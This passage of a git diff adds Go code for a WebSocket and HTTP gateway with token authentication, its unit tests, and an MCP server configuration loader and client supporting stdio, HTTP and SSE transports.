+	"encoding/json"
+	"log"
+	"net/http"
+	"sync"
+	"time"
+)
+
+// Gateway is the WebSocket + HTTP gateway server.
+type Gateway struct {
+	mu          sync.RWMutex
+	mux         *http.ServeMux
+	httpServer  *http.Server
+	dispatcher  Dispatcher
+	platforms   PlatformStatusProvider
+	memoryStore MemoryStore
+	version     string
+	authToken   string
+	startTime   time.Time
+
+	// Active WebSocket connections
+	connMu sync.RWMutex
+	conns  map[string]*WSConn
+}
+
+// Dispatcher is the interface the gateway uses to dispatch messages.
+type Dispatcher interface {
+	HandleWSMessage(ctx context.Context, connID, text string, eventCh chan<- WSEvent) error
+	ListSessions() []SessionInfo
+	RemoveSession(key string)
+	ResolveApproval(approvalID string, approved bool) bool
+}
+
+// SessionInfo is a simplified session view for API responses.
+type SessionInfo struct {
+	ID           string    `json:"id"`
+	Platform     string    `json:"platform"`
+	UserID       string    `json:"user_id"`
+	WorkDir      string    `json:"work_dir"`
+	Mode         string    `json:"mode,omitempty"`
+	Model        string    `json:"model,omitempty"`
+	MessageCount int       `json:"message_count"`
+	LastActive   time.Time `json:"last_active"`
+	Preview      string    `json:"preview,omitempty"`
+}
+
+// PlatformStatus represents a messaging platform's connection status.
+type PlatformStatus struct {
+	Name        string   `json:"name"`
+	Enabled     bool     `json:"enabled"`
+	Connected   bool     `json:"connected"`
+	WorkDir     string   `json:"work_dir,omitempty"`
+	ActiveUsers []string `json:"active_users,omitempty"`
+	LoginStatus string   `json:"login_status,omitempty"`
+}
+
+// PlatformStatusProvider supplies platform connection status.
+type PlatformStatusProvider interface {
+	GetPlatformStatuses() []PlatformStatus
+}
+
+// NewGateway creates a new gateway server.
+func NewGateway(listenAddr, authToken, version string) *Gateway {
+	gw := &Gateway{
+		mux:       http.NewServeMux(),
+		version:   version,
+		authToken: authToken,
+		startTime: time.Now(),
+		conns:     make(map[string]*WSConn),
+	}
+
+	gw.httpServer = &http.Server{
+		Addr:         listenAddr,
+		Handler:      gw.mux,
+		ReadTimeout:  30 * time.Second,
+		WriteTimeout: 300 * time.Second,
+		IdleTimeout:  120 * time.Second,
+	}
+
+	// Register routes
+	gw.mux.HandleFunc("/ws", gw.handleWebSocket)
+	gw.mux.HandleFunc("/api/health", gw.handleHealth)
+	gw.mux.HandleFunc("/api/status", gw.withAuth(gw.handleStatus))
+	gw.mux.HandleFunc("/api/sessions", gw.withAuth(gw.handleSessions))
+	gw.mux.HandleFunc("/api/sessions/", gw.withAuth(gw.handleSessionByID))
+	gw.mux.HandleFunc("/api/memory", gw.withAuth(gw.handleMemory))
+	gw.mux.HandleFunc("/api/platforms", gw.withAuth(gw.handlePlatforms))
+
+	return gw
+}
+
+// RegisterHandler registers an additional HTTP handler on the gateway mux.
+func (gw *Gateway) RegisterHandler(pattern string, handler http.Handler) {
+	gw.mux.Handle(pattern, handler)
+}
+
+// SetDispatcher sets the message dispatcher.
+func (gw *Gateway) SetDispatcher(d Dispatcher) {
+	gw.mu.Lock()
+	defer gw.mu.Unlock()
+	gw.dispatcher = d
+}
+
+// SetPlatformStatusProvider sets the platform status provider.
+func (gw *Gateway) SetPlatformStatusProvider(p PlatformStatusProvider) {
+	gw.mu.Lock()
+	defer gw.mu.Unlock()
+	gw.platforms = p
+}
+
+// MemoryStore provides read/write access to memory.md.
+type MemoryStore interface {
+	Read() (content string, path string, source string, err error)
+	WriteAll(content string) error
+}
+
+// SetMemoryStore sets the memory store for the /api/memory endpoint.
+func (gw *Gateway) SetMemoryStore(s MemoryStore) {
+	gw.mu.Lock()
+	defer gw.mu.Unlock()
+	gw.memoryStore = s
+}
+
+// GetMux returns the HTTP mux for registering additional routes.
+func (gw *Gateway) GetMux() *http.ServeMux {
+	return gw.mux
+}
+
+// Start starts the HTTP server. Blocks until stopped.
+func (gw *Gateway) Start() error {
+	log.Printf("Hermes gateway listening on %s", gw.httpServer.Addr)
+	return gw.httpServer.ListenAndServe()
+}
+
+// Stop gracefully shuts down the gateway.
+func (gw *Gateway) Stop(timeout time.Duration) error {
+	ctx, cancel := context.WithTimeout(context.Background(), timeout)
+	defer cancel()
+
+	// Close all WebSocket connections
+	gw.connMu.Lock()
+	for _, conn := range gw.conns {
+		conn.Close()
+	}
+	gw.connMu.Unlock()
+
+	return gw.httpServer.Shutdown(ctx)
+}
+
+// ConnectionCount returns the number of active WebSocket connections.
+func (gw *Gateway) ConnectionCount() int {
+	gw.connMu.RLock()
+	defer gw.connMu.RUnlock()
+	return len(gw.conns)
+}
+
+// --- Auth middleware ---
+
+func (gw *Gateway) withAuth(handler http.HandlerFunc) http.HandlerFunc {
+	return func(w http.ResponseWriter, r *http.Request) {
+		if gw.authToken != "" {
+			if !gw.validToken(requestAuthToken(r)) {
+				writeJSON(w, http.StatusUnauthorized, map[string]string{"error": "unauthorized"})
+				return
+			}
+		}
+		handler(w, r)
+	}
+}
+
+func requestAuthToken(r *http.Request) string {
+	const prefix = "Bearer "
+	token := r.Header.Get("Authorization")
+	if len(token) > len(prefix) && token[:len(prefix)] == prefix {
+		return token[len(prefix):]
+	}
+	if token != "" {
+		return token
+	}
+	return r.URL.Query().Get("token")
+}
+
+func (gw *Gateway) validToken(token string) bool {
+	if token == "" || len(token) != len(gw.authToken) {
+		return false
+	}
+	return subtle.ConstantTimeCompare([]byte(token), []byte(gw.authToken)) == 1
+}
+
+// --- Helpers ---
+
+func writeJSON(w http.ResponseWriter, status int, v any) {
+	w.Header().Set("Content-Type", "application/json")
+	w.WriteHeader(status)
+	json.NewEncoder(w).Encode(v)
+}
diff --git a/internal/hermes/ws/server_test.go b/internal/hermes/ws/server_test.go
new file mode 100644
index 0000000..3106c61
--- /dev/null
+++ b/internal/hermes/ws/server_test.go
@@ -0,0 +1,374 @@
+package ws
+
+import (
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+	"time"
+)
+
+func TestNewGateway(t *testing.T) {
+	gw := NewGateway("localhost:8090", "test-token", "0.1.27")
+	if gw == nil {
+		t.Fatal("expected gateway")
+	}
+	if gw.version != "0.1.27" {
+		t.Errorf("expected version 0.1.27, got %s", gw.version)
+	}
+	if gw.authToken != "test-token" {
+		t.Errorf("expected token test-token, got %s", gw.authToken)
+	}
+}
+
+func TestGatewayConnectionCount(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+	if gw.ConnectionCount() != 0 {
+		t.Errorf("expected 0 connections, got %d", gw.ConnectionCount())
+	}
+}
+
+func TestHandleHealth(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	req := httptest.NewRequest("GET", "/api/health", nil)
+	w := httptest.NewRecorder()
+	gw.handleHealth(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var result map[string]any
+	json.NewDecoder(w.Body).Decode(&result)
+	if result["status"] != "ok" {
+		t.Errorf("expected ok, got %v", result["status"])
+	}
+	if result["version"] != "0.1.27" {
+		t.Errorf("expected 0.1.27, got %v", result["version"])
+	}
+}
+
+func TestHandleHealthMethodNotAllowed(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	req := httptest.NewRequest("POST", "/api/health", nil)
+	w := httptest.NewRecorder()
+	gw.handleHealth(w, req)
+
+	if w.Code != http.StatusMethodNotAllowed {
+		t.Errorf("expected 405, got %d", w.Code)
+	}
+}
+
+func TestHandleStatus(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	req := httptest.NewRequest("GET", "/api/status", nil)
+	w := httptest.NewRecorder()
+	gw.handleStatus(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var result map[string]any
+	json.NewDecoder(w.Body).Decode(&result)
+	if result["version"] != "0.1.27" {
+		t.Errorf("expected 0.1.27, got %v", result["version"])
+	}
+}
+
+func TestHandleSessions(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	// No dispatcher set
+	req := httptest.NewRequest("GET", "/api/sessions", nil)
+	w := httptest.NewRecorder()
+	gw.handleSessions(w, req)
+
+	if w.Code != http.StatusServiceUnavailable {
+		t.Errorf("expected 503, got %d", w.Code)
+	}
+}
+
+func TestHandleMemoryNoStore(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	req := httptest.NewRequest("GET", "/api/memory", nil)
+	w := httptest.NewRecorder()
+	gw.handleMemory(w, req)
+
+	if w.Code != http.StatusServiceUnavailable {
+		t.Errorf("expected 503, got %d", w.Code)
+	}
+}
+
+func TestHandlePlatforms(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	req := httptest.NewRequest("GET", "/api/platforms", nil)
+	w := httptest.NewRecorder()
+	gw.handlePlatforms(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var result map[string]any
+	json.NewDecoder(w.Body).Decode(&result)
+	platforms, ok := result["platforms"].([]any)
+	if !ok {
+		t.Fatal("expected platforms array")
+	}
+	if len(platforms) != 0 {
+		t.Errorf("expected 0 platforms, got %d", len(platforms))
+	}
+}
+
+func TestWithAuthNoToken(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	called := false
+	handler := gw.withAuth(func(w http.ResponseWriter, r *http.Request) {
+		called = true
+		w.WriteHeader(http.StatusOK)
+	})
+
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler(w, req)
+
+	if !called {
+		t.Error("expected handler to be called (no auth configured)")
+	}
+}
+
+func TestWithAuthValidToken(t *testing.T) {
+	gw := NewGateway("localhost:8090", "secret", "0.1.27")
+
+	called := false
+	handler := gw.withAuth(func(w http.ResponseWriter, r *http.Request) {
+		called = true
+		w.WriteHeader(http.StatusOK)
+	})
+
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Authorization", "Bearer secret")
+	w := httptest.NewRecorder()
+	handler(w, req)
+
+	if !called {
+		t.Error("expected handler to be called (valid token)")
+	}
+}
+
+func TestRequestAuthTokenPrefersBearerHeader(t *testing.T) {
+	req := httptest.NewRequest("GET", "/test?token=query-secret", nil)
+	req.Header.Set("Authorization", "Bearer header-secret")
+
+	if got := requestAuthToken(req); got != "header-secret" {
+		t.Fatalf("requestAuthToken = %q, want header-secret", got)
+	}
+}
+
+func TestWithAuthInvalidToken(t *testing.T) {
+	gw := NewGateway("localhost:8090", "secret", "0.1.27")
+
+	called := false
+	handler := gw.withAuth(func(w http.ResponseWriter, r *http.Request) {
+		called = true
+	})
+
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Authorization", "Bearer wrong")
+	w := httptest.NewRecorder()
+	handler(w, req)
+
+	if called {
+		t.Error("expected handler NOT to be called (invalid token)")
+	}
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("expected 401, got %d", w.Code)
+	}
+}
+
+func TestWithAuthQueryToken(t *testing.T) {
+	gw := NewGateway("localhost:8090", "secret", "0.1.27")
+
+	called := false
+	handler := gw.withAuth(func(w http.ResponseWriter, r *http.Request) {
+		called = true
+		w.WriteHeader(http.StatusOK)
+	})
+
+	req := httptest.NewRequest("GET", "/test?token=secret", nil)
+	w := httptest.NewRecorder()
+	handler(w, req)
+
+	if !called {
+		t.Error("expected handler to be called (query token)")
+	}
+}
+
+func TestWithAuthNoAuthHeader(t *testing.T) {
+	gw := NewGateway("localhost:8090", "secret", "0.1.27")
+
+	called := false
+	handler := gw.withAuth(func(w http.ResponseWriter, r *http.Request) {
+		called = true
+	})
+
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler(w, req)
+
+	if called {
+		t.Error("expected handler NOT to be called (no auth)")
+	}
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("expected 401, got %d", w.Code)
+	}
+}
+
+func TestSessionInfo(t *testing.T) {
+	info := SessionInfo{
+		ID:           "test-session",
+		Platform:     "ws",
+		UserID:       "user1",
+		WorkDir:      "/tmp",
+		Mode:         "yolo",
+		MessageCount: 5,
+		LastActive:   time.Now(),
+		Preview:      "hello",
+	}
+
+	if info.ID != "test-session" {
+		t.Errorf("expected test-session, got %s", info.ID)
+	}
+	if info.Platform != "ws" {
+		t.Errorf("expected ws, got %s", info.Platform)
+	}
+}
+
+func TestPlatformStatus(t *testing.T) {
+	status := PlatformStatus{
+		Name:        "wechat",
+		Enabled:     true,
+		Connected:   true,
+		WorkDir:     "/tmp",
+		ActiveUsers: []string{"user1", "user2"},
+		LoginStatus: "logged_in",
+	}
+
+	if status.Name != "wechat" {
+		t.Errorf("expected wechat, got %s", status.Name)
+	}
+	if len(status.ActiveUsers) != 2 {
+		t.Errorf("expected 2 users, got %d", len(status.ActiveUsers))
+	}
+}
+
+func TestWSEventSerialization(t *testing.T) {
+	ev := WSEvent{
+		Type:    "text_delta",
+		Content: "hello",
+		Tool:    "read",
+		CallID:  "tc_123",
+	}
+
+	data, err := json.Marshal(ev)
+	if err != nil {
+		t.Fatalf("marshal error: %v", err)
+	}
+
+	var got WSEvent
+	if err := json.Unmarshal(data, &got); err != nil {
+		t.Fatalf("unmarshal error: %v", err)
+	}
+
+	if got.Type != "text_delta" {
+		t.Errorf("expected text_delta, got %s", got.Type)
+	}
+	if got.Content != "hello" {
+		t.Errorf("expected hello, got %s", got.Content)
+	}
+	if got.Tool != "read" {
+		t.Errorf("expected read, got %s", got.Tool)
+	}
+}
+
+func TestClientMessageSerialization(t *testing.T) {
+	msg := ClientMessage{
+		Type:       "approval",
+		ApprovalID: "ap_123",
+		Approved:   true,
+	}
+
+	data, err := json.Marshal(msg)
+	if err != nil {
+		t.Fatalf("marshal error: %v", err)
+	}
+
+	var got ClientMessage
+	if err := json.Unmarshal(data, &got); err != nil {
+		t.Fatalf("unmarshal error: %v", err)
+	}
+
+	if got.Type != "approval" {
+		t.Errorf("expected approval, got %s", got.Type)
+	}
+	if !got.Approved {
+		t.Error("expected approved=true")
+	}
+}
+
+func TestPlanDataSerialization(t *testing.T) {
+	plan := PlanData{
+		Title: "Test Plan",
+		Steps: []PlanStep{
+			{Title: "Step 1", Status: "done"},
+			{Title: "Step 2", Status: "running"},
+		},
+	}
+
+	data, err := json.Marshal(plan)
+	if err != nil {
+		t.Fatalf("marshal error: %v", err)
+	}
+
+	var got PlanData
+	if err := json.Unmarshal(data, &got); err != nil {
+		t.Fatalf("unmarshal error: %v", err)
+	}
+
+	if got.Title != "Test Plan" {
+		t.Errorf("expected Test Plan, got %s", got.Title)
+	}
+	if len(got.Steps) != 2 {
+		t.Errorf("expected 2 steps, got %d", len(got.Steps))
+	}
+}
+
+func TestGatewayRoutesRegistered(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	// Check that HTTP routes are registered (skip /ws which requires Hijack)
+	routes := []string{
+		"/api/health",
+		"/api/status",
+		"/api/sessions",
+		"/api/memory",
+		"/api/platforms",
+	}
+
+	for _, route := range routes {
+		req := httptest.NewRequest("GET", route, nil)
+		w := httptest.NewRecorder()
+		gw.mux.ServeHTTP(w, req)
+		// We just want to verify the route exists (not 404 from mux)
+		if w.Code == http.StatusNotFound && w.Body.String() == "404 page not found\n" {
+			t.Errorf("route %s not registered", route)
+		}
+	}
+}
diff --git a/internal/mcp/config.go b/internal/mcp/config.go
new file mode 100644
index 0000000..d1d47f9
--- /dev/null
+++ b/internal/mcp/config.go
@@ -0,0 +1,61 @@
+package mcp
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+// LoadConfiguredServers loads usable MCP servers from global and project mcp.json.
+// Missing config files are ignored. Obvious template placeholders are skipped so
+// creating a starter config does not break normal startup.
+func LoadConfiguredServers(cwd string) ([]ServerConfig, error) {
+	paths := []string{
+		config.GlobalMCPPath(),
+		filepath.Join(cwd, config.ProjectMCPPath()),
+	}
+	var servers []ServerConfig
+	for _, path := range paths {
+		cfg, err := config.LoadMCPConfig(path)
+		if err != nil {
+			if os.IsNotExist(err) {
+				continue
+			}
+			return nil, fmt.Errorf("load MCP config %s: %w", path, err)
+		}
+		config.NormalizeMCPConfig(cfg)
+		for _, srv := range cfg.MCPServers {
+			if isTemplateServer(srv) {
+				continue
+			}
+			servers = append(servers, srv)
+		}
+	}
+	return servers, nil
+}
+
+func isTemplateServer(srv config.MCPServer) bool {
+	if strings.TrimSpace(srv.Name) == "" {
+		return true
+	}
+	if strings.Contains(srv.Command, "/absolute/path/to/mcp-server") {
+		return true
+	}
+	if strings.Contains(srv.URL, "example.com") || strings.Contains(srv.MessageURL, "example.com") {
+		return true
+	}
+	for _, header := range srv.Headers {
+		if strings.TrimSpace(header.Value) == "replace-me" || strings.Contains(header.Value, "Bearer replace-me") {
+			return true
+		}
+	}
+	for _, env := range srv.Env {
+		if strings.TrimSpace(env.Value) == "replace-me" {
+			return true
+		}
+	}
+	return false
+}
diff --git a/internal/mcp/config_test.go b/internal/mcp/config_test.go
new file mode 100644
index 0000000..ba21fb0
--- /dev/null
+++ b/internal/mcp/config_test.go
@@ -0,0 +1,43 @@
+package mcp
+
+import (
+	"testing"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+func TestIsTemplateServer(t *testing.T) {
+	cases := []struct {
+		name string
+		srv  config.MCPServer
+		want bool
+	}{
+		{
+			name: "real stdio",
+			srv:  config.MCPServer{Name: "local", Type: "stdio", Command: "/usr/local/bin/mcp-server"},
+		},
+		{
+			name: "empty name",
+			srv:  config.MCPServer{Type: "stdio", Command: "/usr/local/bin/mcp-server"},
+			want: true,
+		},
+		{
+			name: "placeholder command",
+			srv:  config.MCPServer{Name: "example", Type: "stdio", Command: "/absolute/path/to/mcp-server"},
+			want: true,
+		},
+		{
+			name: "placeholder url",
+			srv:  config.MCPServer{Name: "example", Type: "http", URL: "https://mcp.example.com"},
+			want: true,
+		},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if got := isTemplateServer(tc.srv); got != tc.want {
+				t.Fatalf("isTemplateServer() = %v, want %v", got, tc.want)
+			}
+		})
+	}
+}
diff --git a/internal/mcp/mcp.go b/internal/mcp/mcp.go
new file mode 100644
index 0000000..e24378d
--- /dev/null
+++ b/internal/mcp/mcp.go
@@ -0,0 +1,1219 @@
+package mcp
+
+import (
+	"bufio"
+	"bytes"
+	"context"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"net/http"
+	"net/url"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+	"sync"
+	"sync/atomic"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+const mcpProtocolVersion = "2025-11-25"
+
+const (
+	mcpInitializeTimeout = 15 * time.Second
+	mcpListToolsTimeout  = 15 * time.Second
+	mcpCallTimeout       = 60 * time.Second
+	mcpMaxListPages      = 100
+)
+
+type ServerConfig = config.MCPServer
+
+type Client struct {
+	name    string
+	cmd     *exec.Cmd
+	stdin   io.WriteCloser
+	pending map[string]chan mcpResponse
+	mu      sync.Mutex
+	wmu     sync.Mutex
+	smu     sync.RWMutex
+	closed  atomic.Bool
+	nextID  int64
+
+	transport  string
+	httpClient *http.Client
+	httpURL    string
+	messageURL string
+	headers    map[string]string
+	sseCancel  context.CancelFunc
+	sessionID  string
+	callbacks  Callbacks
+}
+
+func (c *Client) currentSessionID() string {
+	c.smu.RLock()
+	defer c.smu.RUnlock()
+	return c.sessionID
+}
+
+func (c *Client) setSessionID(sid string) {
+	sid = strings.TrimSpace(sid)
+	if sid == "" {
+		return
+	}
+	c.smu.Lock()
+	defer c.smu.Unlock()
+	c.sessionID = sid
+}
+
+type Callbacks struct {
+	OnNotification          func(serverName, method string, params json.RawMessage)
+	OnSamplingCreateMessage func(ctx context.Context, serverName string, params json.RawMessage) (json.RawMessage, *RPCError)
+}
+
+type RPCRequest struct {
+	JSONRPC string          `json:"jsonrpc"`
+	ID      json.RawMessage `json:"id,omitempty"`
+	Method  string          `json:"method"`
+	Params  json.RawMessage `json:"params,omitempty"`
+	Result  json.RawMessage `json:"result,omitempty"`
+	Error   json.RawMessage `json:"error,omitempty"`
+}
+
+type RPCError struct {
+	Code    int    `json:"code"`
+	Message string `json:"message"`
+	Data    any    `json:"data,omitempty"`
+}
+
+type mcpResponse struct {
+	Result json.RawMessage
+	Error  *RPCError
+}
+
+type mcpToolInfo struct {
+	Name        string          `json:"name"`
+	Description string          `json:"description,omitempty"`
+	InputSchema json.RawMessage `json:"inputSchema,omitempty"`
+}
+
+type mcpListToolsResult struct {
+	Tools      []mcpToolInfo `json:"tools"`
+	NextCursor string        `json:"nextCursor,omitempty"`
+}
+
+type mcpCallToolResult struct {
+	Content []mcpContentBlock `json:"content,omitempty"`
+	IsError bool              `json:"isError,omitempty"`
+}
+
+type mcpResourceInfo struct {
+	URI         string `json:"uri"`
+	Name        string `json:"name,omitempty"`
+	Description string `json:"description,omitempty"`
+	MimeType    string `json:"mimeType,omitempty"`
+}
+
+type mcpListResourcesResult struct {
+	Resources  []mcpResourceInfo `json:"resources"`
+	NextCursor string            `json:"nextCursor,omitempty"`
+}
+
+type mcpResourceReadResult struct {
+	Contents []mcpContentBlock `json:"contents,omitempty"`
+}
+
+type mcpPromptInfo struct {
+	Name        string `json:"name"`
+	Description string `json:"description,omitempty"`
+}
+
+type mcpListPromptsResult struct {
+	Prompts    []mcpPromptInfo `json:"prompts"`
+	NextCursor string          `json:"nextCursor,omitempty"`
+}
+
+type mcpPromptGetResult struct {
+	Description string            `json:"description,omitempty"`
+	Messages    []mcpPromptSample `json:"messages,omitempty"`
+}
+
+type mcpPromptSample struct {
+	Role    string          `json:"role"`
+	Content mcpContentBlock `json:"content"`
+}
+
+type mcpContentBlock struct {
+	Type     string          `json:"type"`
+	Text     string          `json:"text,omitempty"`
+	Data     string          `json:"data,omitempty"`
+	MimeType string          `json:"mimeType,omitempty"`
+	JSON     json.RawMessage `json:"json,omitempty"`
+}
+
+func ConnectServers(ctx context.Context, configs []ServerConfig, registry *tools.Registry, callbacks Callbacks) ([]*Client, error) {
+	var clients []*Client
+	seenServers := make(map[string]struct{})
+	registeredToolNames := make(map[string]struct{})
+	for _, t := range registry.All() {
+		registeredToolNames[t.Name()] = struct{}{}
+	}
+	for _, cfg := range configs {
+		trimmedName := strings.TrimSpace(cfg.Name)
+		if _, ok := seenServers[trimmedName]; ok {
+			CloseClients(clients)
+			return nil, fmt.Errorf("duplicate MCP server name %q", cfg.Name)
+		}
+		seenServers[trimmedName] = struct{}{}
+		client, err := newMCPClient(ctx, cfg, callbacks)
+		if err != nil {
+			CloseClients(clients)
+			return nil, err
+		}
+		clients = append(clients, client)
+		toolInfos, err := client.listTools(ctx)
+		if err != nil {
+			CloseClients(clients)
+			return nil, err
+		}
+		for _, info := range toolInfos {
+			if strings.TrimSpace(info.Name) == "" {
+				continue
+			}
+			tool := newMCPTool(client, info, registeredToolNames)
+			registeredToolNames[tool.Name()] = struct{}{}
+			registry.Register(tool)
+		}
+		resourceInfos, err := client.listResources(ctx)
+		if err == nil {
+			for _, info := range resourceInfos {
+				if strings.TrimSpace(info.URI) == "" {
+					continue
+				}
+				tool := newMCPResourceTool(client, info, registeredToolNames)
+				registeredToolNames[tool.Name()] = struct{}{}
+				registry.Register(tool)
+			}
+		}
+		promptInfos, err := client.listPrompts(ctx)
+		if err == nil {
+			for _, info := range promptInfos {
+				if strings.TrimSpace(info.Name) == "" {
+					continue
+				}
+				tool := newMCPPromptTool(client, info, registeredToolNames)
+				registeredToolNames[tool.Name()] = struct{}{}
+				registry.Register(tool)
+			}
+		}
+	}
+	return clients, nil
+}
+
+func CloseClients(clients []*Client) {
+	for _, client := range clients {
+		client.Close()
+	}
+}
+
+func newMCPClient(ctx context.Context, cfg ServerConfig, callbacks Callbacks) (*Client, error) {
+	if strings.TrimSpace(cfg.Name) == "" {
+		return nil, fmt.Errorf("MCP server name is required")
+	}
+	transport := strings.TrimSpace(cfg.Type)
+	if transport == "" {
+		transport = "stdio"
+	}
+	switch transport {
+	case "stdio":
+		return newMCPStdioClient(ctx, cfg, callbacks)
+	case "http":
+		return newMCPHTTPClient(ctx, cfg, false, callbacks)
+	case "sse":
+		return newMCPHTTPClient(ctx, cfg, true, callbacks)
+	default:
+		return nil, fmt.Errorf("unsupported MCP transport %q for server %q", cfg.Type, cfg.Name)
+	}
+}
+
+func newMCPStdioClient(ctx context.Context, cfg ServerConfig, callbacks Callbacks) (*Client, error) {
+	if strings.TrimSpace(cfg.Command) == "" {
+		return nil, fmt.Errorf("MCP server %q command is required", cfg.Name)
+	}
+	if !filepath.IsAbs(cfg.Command) {
+		return nil, fmt.Errorf("MCP server %q command must be an absolute path", cfg.Name)
+	}
+
+	cmd := exec.CommandContext(ctx, cfg.Command, cfg.Args...)
+	cmd.Env = os.Environ()
+	for _, env := range cfg.Env {
+		cmd.Env = append(cmd.Env, env.Name+"="+env.Value)
+	}
+	cmd.Stderr = os.Stderr
+
+	stdin, err := cmd.StdinPipe()
+	if err != nil {
+		return nil, fmt.Errorf("open MCP stdin for %q: %w", cfg.Name, err)
+	}
+	stdout, err := cmd.StdoutPipe()
+	if err != nil {
+		return nil, fmt.Errorf("open MCP stdout for %q: %w", cfg.Name, err)
+	}
+	if err := cmd.Start(); err != nil {
+		return nil, fmt.Errorf("start MCP server %q: %w", cfg.Name, err)
+	}
+
+	client := &Client{
+		name:      cfg.Name,
+		cmd:       cmd,
+		stdin:     stdin,
+		pending:   make(map[string]chan mcpResponse),
+		transport: "stdio",
+		callbacks: callbacks,
+	}
+	go client.readLoop(stdout)
+	go func() {
+		_ = cmd.Wait()
+		client.closePending(fmt.Errorf("MCP server %q exited", cfg.Name))
+	}()
+
+	initCtx, cancel := context.WithTimeout(ctx, mcpInitializeTimeout)
+	defer cancel()
+	if _, err := client.call(initCtx, "initialize", map[string]any{
+		"protocolVersion": mcpProtocolVersion,
+		"capabilities":    map[string]any{},
+		"clientInfo": map[string]any{
+			"name":    "vibecoding",
+			"title":   "VibeCoding",
+			"version": "dev",
+		},
+	}); err != nil {
+		client.Close()
+		return nil, fmt.Errorf("initialize MCP server %q: %w", cfg.Name, err)
+	}
+	if err := client.notify("notifications/initialized", nil); err != nil {
+		client.Close()
+		return nil, fmt.Errorf("initialize MCP server %q: %w", cfg.Name, err)
+	}
+	return client, nil
+}
+
+func newMCPHTTPClient(ctx context.Context, cfg ServerConfig, legacySSE bool, callbacks Callbacks) (*Client, error) {
+	rawURL := strings.TrimSpace(cfg.URL)
+	if rawURL == "" {
+		return nil, fmt.Errorf("MCP server %q url is required for %s transport", cfg.Name, cfg.Type)
+	}
+	parsedURL, err := url.Parse(rawURL)
+	if err != nil || (parsedURL.Scheme != "http" && parsedURL.Scheme != "https") {
+		return nil, fmt.Errorf("MCP server %q url must be a valid http(s) URL", cfg.Name)
+	}
+
+	headers := map[string]string{}
+	for _, h := range cfg.Headers {
+		name := strings.TrimSpace(h.Name)
+		if name == "" {
+			continue
+		}
+		headers[name] = h.Value
+	}
+	client := &Client{
+		name:       cfg.Name,
+		pending:    make(map[string]chan mcpResponse),
+		transport:  cfg.Type,
+		httpClient: &http.Client{},
+		httpURL:    rawURL,
+		headers:    headers,
+		callbacks:  callbacks,
+	}
+	if legacySSE {
+		msgURL := strings.TrimSpace(cfg.MessageURL)
+		if msgURL == "" {
+			return nil, fmt.Errorf("MCP server %q messageUrl is required for sse transport", cfg.Name)
+		}
+		client.messageURL = msgURL
+		sseCtx, cancel := context.WithCancel(context.Background())
+		client.sseCancel = cancel
+		go client.readSSELoop(sseCtx, rawURL)
+	}
+
+	initCtx, cancel := context.WithTimeout(ctx, mcpInitializeTimeout)
+	defer cancel()
+	if _, err := client.call(initCtx, "initialize", map[string]any{
+		"protocolVersion": mcpProtocolVersion,
+		"capabilities":    map[string]any{},
+		"clientInfo": map[string]any{
+			"name":    "vibecoding",
+			"title":   "VibeCoding",
+			"version": "dev",
+		},
+	}); err != nil {
+		client.Close()
+		return nil, fmt.Errorf("initialize MCP server %q: %w", cfg.Name, err)
+	}
+	if err := client.notify("notifications/initialized", nil); err != nil {
+		client.Close()
+		return nil, fmt.Errorf("initialize MCP server %q: %w", cfg.Name, err)
+	}
+	return client, nil
+}
+
+func (c *Client) listTools(ctx context.Context) ([]mcpToolInfo, error) {
+	listCtx, cancel := context.WithTimeout(ctx, mcpListToolsTimeout)
+	defer cancel()
+
+	var all []mcpToolInfo
+	cursor := ""
+	for page := 0; page < mcpMaxListPages; page++ {
+		params := map[string]any{}
+		if cursor != "" {
+			params["cursor"] = cursor
+		}
+		result, err := c.call(listCtx, "tools/list", params)
+		if err != nil {
+			return nil, fmt.Errorf("list MCP tools for %q: %w", c.name, err)
+		}
+		var out mcpListToolsResult
+		if err := json.Unmarshal(result, &out); err != nil {
+			return nil, fmt.Errorf("decode MCP tools for %q: %w", c.name, err)
+		}
+		all = append(all, out.Tools...)
+		if out.NextCursor == "" {
+			return all, nil
+		}
+		cursor = out.NextCursor
+	}
+	return nil, fmt.Errorf("list MCP tools for %q: too many pages", c.name)
+}
+
+func (c *Client) callTool(ctx context.Context, name string, args map[string]any) (mcpCallToolResult, error) {
+	result, err := c.call(ctx, "tools/call", map[string]any{
+		"name":      name,
+		"arguments": args,
+	})
+	if err != nil {
+		return mcpCallToolResult{}, err
+	}
+	var out mcpCallToolResult
+	if err := json.Unmarshal(result, &out); err != nil {
+		return mcpCallToolResult{}, err
+	}
+	if out.IsError {
+		return out, fmt.Errorf("%s", mcpContentToText(out.Content))
+	}
+	return out, nil
+}
+
